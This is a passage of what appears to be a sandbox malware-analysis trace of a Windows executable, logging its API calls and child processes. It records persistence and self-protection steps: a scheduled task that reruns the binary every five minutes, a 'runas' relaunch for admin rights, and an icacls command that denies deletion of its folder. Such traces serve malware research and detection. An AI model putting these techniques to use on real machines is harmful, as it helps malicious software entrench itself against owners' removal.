CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18e2bc | out: ppv=0x18e2bc*=0x2980b00) returned 0x0 [0086.866] TaskScheduler:ITaskService:Connect (This=0x2980b00, serverName=0x18dd48*(varType=0x0, wReserved1=0x32d, wReserved2=0x6f58, wReserved3=0x32d, varVal1=0xd7, varVal2=0x1b0), user=0x18dd58*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x1b8), domain=0x18dd68*(varType=0x0, wReserved1=0x0, wReserved2=0x1b0, wReserved3=0x0, varVal1=0xd7, varVal2=0x7), password=0x18dd78*(varType=0x0, wReserved1=0x32c, wReserved2=0xe264, wReserved3=0x18, varVal1=0x420cab, varVal2=0x220000)) returned 0x0 [0086.882] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6738 [0086.882] TaskScheduler:ITaskService:GetFolder (in: This=0x2980b00, Path="\\", ppFolder=0x18e2c4 | out: ppFolder=0x18e2c4*=0x69ff98) returned 0x0 [0086.892] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6738 | out: hHeap=0x220000) returned 1 [0086.892] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6738 [0086.892] ITaskFolder:DeleteTask (This=0x69ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0086.894] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6738 | out: hHeap=0x220000) returned 1 [0086.895] TaskScheduler:ITaskService:NewTask (in: This=0x2980b00, flags=0x0, ppDefinition=0x18e2c8 | out: ppDefinition=0x18e2c8*=0x2980b88) returned 0x0 [0086.897] TaskScheduler:IUnknown:Release (This=0x2980b00) returned 0x1 [0086.898] ITaskDefinition:get_RegistrationInfo (in: This=0x2980b88, ppRegistrationInfo=0x18e29c | out: ppRegistrationInfo=0x18e29c*=0x2980c48) returned 0x0 [0086.898] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0086.898] IRegistrationInfo:put_Author (This=0x2980c48, Author="Author Name") returned 0x0 [0086.898] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0086.898] IUnknown:Release (This=0x2980c48) returned 0x1 [0086.898] ITaskDefinition:get_Principal (in: This=0x2980b88, ppPrincipal=0x18e2a4 | out: ppPrincipal=0x18e2a4*=0x2980dd8) returned 0x0 [0086.898] IPrincipal:put_LogonType (This=0x2980dd8, LogonType=3) returned 0x0 [0086.898] IUnknown:Release (This=0x2980dd8) returned 0x1 [0086.898] ITaskDefinition:get_Settings (in: This=0x2980b88, ppSettings=0x18e2ac | out: ppSettings=0x18e2ac*=0x2980cf8) returned 0x0 [0086.898] ITaskSettings:put_StartWhenAvailable (This=0x2980cf8, StartWhenAvailable=1) returned 0x0 [0086.898] IUnknown:Release (This=0x2980cf8) returned 0x1 [0086.898] ITaskSettings:get_IdleSettings (in: This=0x2980cf8, ppIdleSettings=0x18e290 | out: ppIdleSettings=0x18e290*=0x2980d68) returned 0x0 [0086.898] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0086.899] IIdleSettings:put_WaitTimeout (This=0x2980d68, WaitTimeout="PT5M") returned 0x0 [0086.899] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0086.899] IUnknown:Release (This=0x2980d68) returned 0x1 [0086.899] ITaskDefinition:get_Triggers (in: This=0x2980b88, ppTriggers=0x18e28c | out: ppTriggers=0x18e28c*=0x2980cb8) returned 0x0 [0086.899] ITriggerCollection:Create (in: This=0x2980cb8, Type=1, ppTrigger=0x18e298 | out: ppTrigger=0x18e298*=0x2980e38) returned 0x0 [0086.899] IUnknown:Release (This=0x2980cb8) returned 0x1 [0086.899] IUnknown:QueryInterface (in: This=0x2980e38, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18e2b4 | out: ppvObject=0x18e2b4*=0x2980e38) returned 0x0 [0086.899] IUnknown:Release (This=0x2980e38) returned 0x2 [0086.899] ITrigger:get_Repetition (in: This=0x2980e38, ppRepeat=0x18e2a0 | out: ppRepeat=0x18e2a0*=0x2980e88) returned 0x0 [0086.899] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0086.899] IRepetitionPattern:put_Interval (This=0x2980e88, Interval="PT5M") returned 0x0 [0086.899] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0086.899] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0086.899] IRepetitionPattern:put_Duration (This=0x2980e88, Duration="") returned 0x0 [0086.901] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0086.902] ITrigger:put_Repetition (This=0x2980e38, Repetition=0x2980e88) returned 0x0 [0086.902] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0086.902] ITrigger:put_Id (This=0x2980e38, Id="Trigger1") returned 0x0 [0086.902] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0086.902] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0086.902] ITrigger:put_EndBoundary (This=0x2980e38, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0086.902] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0086.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18dd74 | out: lpSystemTimeAsFileTime=0x18dd74*(dwLowDateTime=0x3517f200, dwHighDateTime=0x1d60a66)) [0086.915] GetLastError () returned 0x0 [0086.927] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x24) returned 0x32ff120 [0086.940] GetLastError () returned 0x0 [0086.946] GetLastError () returned 0x0 [0086.953] GetLastError () returned 0x0 [0086.960] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0087.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18dcdc | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18dcdc) returned 26 [0087.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18dcdc | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18dcdc) returned 26 [0087.012] GetLastError () returned 0x0 [0087.012] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x24) returned 0x32fefa0 [0087.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x32fefa0, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0087.012] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xa0) returned 0x27acb0 [0087.012] GetLastError () returned 0x0 [0087.024] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x20) returned 0x32ff420 [0087.032] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x826) returned 0x32cd778 [0087.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32ff420, cbMultiByte=-1, lpWideCharStr=0x32cd778, cchWideChar=1043 | out: lpWideCharStr="2020-04-04T20:50:13") returned 20 [0087.038] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x830) returned 0x32cdfa8 [0087.039] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32cd778 | out: hHeap=0x220000) returned 1 [0087.039] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32ff420 | out: hHeap=0x220000) returned 1 [0087.039] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0087.039] ITrigger:put_StartBoundary (This=0x2980e38, StartBoundary="2020-04-04T20:50:13") returned 0x0 [0087.039] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0087.039] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32cdfa8 | out: hHeap=0x220000) returned 1 [0087.039] IUnknown:Release (This=0x2980e38) returned 0x1 [0087.039] ITaskDefinition:get_Actions (in: This=0x2980b88, ppActions=0x18e2a8 | out: ppActions=0x18e2a8*=0x2980c00) returned 0x0 [0087.039] IActionCollection:Create (in: This=0x2980c00, Type=0, ppAction=0x18e294 | out: ppAction=0x18e294*=0x2980ec0) returned 0x0 [0087.040] IUnknown:Release (This=0x2980c00) returned 0x1 [0087.040] IUnknown:QueryInterface (in: This=0x2980ec0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18e2b0 | out: ppvObject=0x18e2b0*=0x2980ec0) returned 0x0 [0087.040] IUnknown:Release (This=0x2980ec0) returned 0x2 [0087.040] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0087.040] IExecAction:put_Path (This=0x2980ec0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 0x0 [0087.040] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0087.040] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0087.040] IExecAction:put_Arguments (This=0x2980ec0, Arguments="--Task") returned 0x0 [0087.040] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0087.040] IUnknown:Release (This=0x2980ec0) returned 0x1 [0087.040] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xc) returned 0x32d6780 [0087.040] ITaskFolder:RegisterTaskDefinition (in: This=0x69ff98, Path="Time Trigger Task", pDefinition=0x2980b88, flags=6, UserId=0x18dd50*(varType=0x0, wReserved1=0x32c, wReserved2=0xe264, wReserved3=0x18, varVal1=0x420cab, varVal2=0x220000), password=0x18dd60*(varType=0x0, wReserved1=0x0, wReserved2=0x1b0, wReserved3=0x0, varVal1=0xd7, varVal2=0x7), LogonType=3, sddl=0x18dd74*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x1b8), ppTask=0x18e27c | out: ppTask=0x18e27c*=0x2980f30) returned 0x0 [0087.265] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6780 | out: hHeap=0x220000) returned 1 [0087.265] TaskScheduler:IUnknown:Release (This=0x69ff98) returned 0x0 [0087.265] TaskScheduler:IUnknown:Release (This=0x2980b88) returned 0x0 [0087.265] IUnknown:Release (This=0x2980f30) returned 0x0 [0087.265] CoUninitialize () [0087.269] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d74a8 | out: hHeap=0x220000) returned 1 [0087.269] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d7118 | out: hHeap=0x220000) returned 1 [0087.269] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d6f60 | out: hHeap=0x220000) returned 1 [0087.269] GetVersion () returned 0x1db10106 [0087.269] lstrcpyW (in: lpString1=0x18e6e0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0087.269] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0087.269] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0087.269] ShellExecuteExW (in: pExecInfo=0x18e4a4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e4a4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0087.408] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32a71e8 | out: hHeap=0x220000) returned 1 [0087.409] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32cc0b0 | out: hHeap=0x220000) returned 1 [0087.409] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x27f0e8 | out: hHeap=0x220000) returned 1 [0087.467] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2725b8 | out: hHeap=0x220000) returned 1 [0087.467] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23ec68 | out: hHeap=0x220000) returned 1 [0087.470] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d84d0 | out: hHeap=0x220000) returned 1 [0087.470] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32d7bd8 | out: hHeap=0x220000) returned 1 [0087.476] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x241fd0 | out: hHeap=0x220000) returned 1 [0087.524] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x240690 | out: hHeap=0x220000) returned 1 [0087.524] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f76c | out: phModule=0x18f76c) returned 0 [0087.524] ExitProcess (uExitCode=0x0) [0087.565] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x32ff120 | out: hHeap=0x220000) returned 1 [0087.565] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23f818 | out: hHeap=0x220000) returned 1 [0087.592] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0xaa0 Thread: id = 3 os_tid = 0xaa4 Thread: id = 4 os_tid = 0xaa8 Thread: id = 5 os_tid = 0xa9c Thread: id = 6 os_tid = 0xa48 Thread: id = 7 os_tid = 0xa20 Thread: id = 8 os_tid = 0x57c Thread: id = 23 os_tid = 0x560 Thread: id = 24 os_tid = 0x23c Thread: id = 78 os_tid = 0x4fc Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 9 os_tid = 0xa88 Thread: id = 10 os_tid = 0x534 Thread: id = 11 os_tid = 0x768 Thread: id = 12 os_tid = 0x764 Thread: id = 13 os_tid = 0x758 Thread: id = 14 os_tid = 0x724 Thread: id = 15 os_tid = 0x718 Thread: id = 16 os_tid = 0x714 Thread: id = 17 os_tid = 0x630 Thread: id = 18 os_tid = 0x154 Thread: id = 19 os_tid = 0x150 Thread: id = 20 os_tid = 0x120 Thread: id = 21 os_tid = 0x118 Thread: id = 22 os_tid = 0xf0 Thread: id = 118 os_tid = 0xa9c Thread: id = 119 os_tid = 0x3a4 Thread: id = 120 os_tid = 0xbc8 Thread: id = 121 os_tid = 0xb28 Thread: id = 172 os_tid = 0x88c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 25 os_tid = 0x7b0 Thread: id = 26 os_tid = 0x290 Thread: id = 27 os_tid = 0x43c Thread: id = 28 os_tid = 0x5c4 Thread: id = 29 os_tid = 0x5a8 Thread: id = 30 os_tid = 0xa10 Thread: id = 31 os_tid = 0xbc8 Thread: id = 32 os_tid = 0xa98 Thread: id = 33 os_tid = 0x618 Thread: id = 34 os_tid = 0x3a4 Thread: id = 35 os_tid = 0x308 Thread: id = 36 os_tid = 0x320 Thread: id = 37 os_tid = 0x6cc Thread: id = 38 os_tid = 0x42c Thread: id = 39 os_tid = 0x1e4 Thread: id = 40 os_tid = 0x760 Thread: id = 41 os_tid = 0x75c Thread: id = 42 os_tid = 0x74c Thread: id = 43 os_tid = 0x710 Thread: id = 44 os_tid = 0x6d0 Thread: id = 45 os_tid = 0x6bc Thread: id = 46 os_tid = 0x6b8 Thread: id = 47 os_tid = 0x6b0 Thread: id = 48 os_tid = 0x69c Thread: id = 49 os_tid = 0x698 Thread: id = 50 os_tid = 0x684 Thread: id = 51 os_tid = 0x678 Thread: id = 52 os_tid = 0x4a8 Thread: id = 53 os_tid = 0x46c Thread: id = 54 os_tid = 0x44c Thread: id = 55 os_tid = 0x424 Thread: id = 56 os_tid = 0x420 Thread: id = 57 os_tid = 0x41c Thread: id = 58 os_tid = 0x404 Thread: id = 59 os_tid = 0x14c Thread: id = 60 os_tid = 0x158 Thread: id = 61 os_tid = 0x3fc Thread: id = 62 os_tid = 0x3f4 Thread: id = 63 os_tid = 0x3e8 Thread: id = 64 os_tid = 0x39c Thread: id = 65 os_tid = 0x390 Thread: id = 66 os_tid = 0x38c Thread: id = 67 os_tid = 0x388 Thread: id = 68 os_tid = 0x37c Thread: id = 69 os_tid = 0x374 Thread: id = 90 os_tid = 0x4e4 Thread: id = 91 os_tid = 0x270 Thread: id = 92 os_tid = 0xb0 Thread: id = 93 os_tid = 0xb08 Thread: id = 94 os_tid = 0xb18 Thread: id = 95 os_tid = 0xb48 Thread: id = 96 os_tid = 0xb04 Thread: id = 97 os_tid = 0xafc Thread: id = 98 os_tid = 0xb58 Thread: id = 99 os_tid = 0xac0 Thread: id = 139 os_tid = 0xae0 Thread: id = 140 os_tid = 0x674 Thread: id = 141 os_tid = 0x24c Thread: id = 162 os_tid = 0xaac Thread: id = 163 os_tid = 0xbb4 Thread: id = 164 os_tid = 0xb4c Thread: id = 165 os_tid = 0xb60 Thread: id = 166 os_tid = 0xb50 Thread: id = 167 os_tid = 0xb64 Thread: id = 168 os_tid = 0xb5c Thread: id = 169 os_tid = 0xb38 Thread: id = 170 os_tid = 0x8cc Process: id = "4" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0xabd000" os_pid = "0x1c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb44" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0x7c0 Thread: id = 71 os_tid = 0x5e0 Process: id = "5" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0x348 Thread: id = 73 os_tid = 0x5b4 Thread: id = 74 os_tid = 0x5b0 Thread: id = 75 os_tid = 0x59c Thread: id = 76 os_tid = 0x594 Thread: id = 77 os_tid = 0x58c Thread: id = 100 os_tid = 0xac8 Process: id = "6" image_name = "cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" page_root = "0x5ee80000" os_pid = "0x114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb44" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 79 os_tid = 0x7ec [0087.811] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x35961ae0, dwHighDateTime=0x1d60a66)) [0087.811] GetCurrentProcessId () returned 0x114 [0087.811] GetCurrentThreadId () returned 0x7ec [0087.811] GetTickCount () returned 0x114b156 [0087.811] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=20814564819) returned 1 [0087.869] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0087.869] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x6e0000 [0087.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0087.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0087.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0087.870] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0087.870] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.871] GetProcAddress 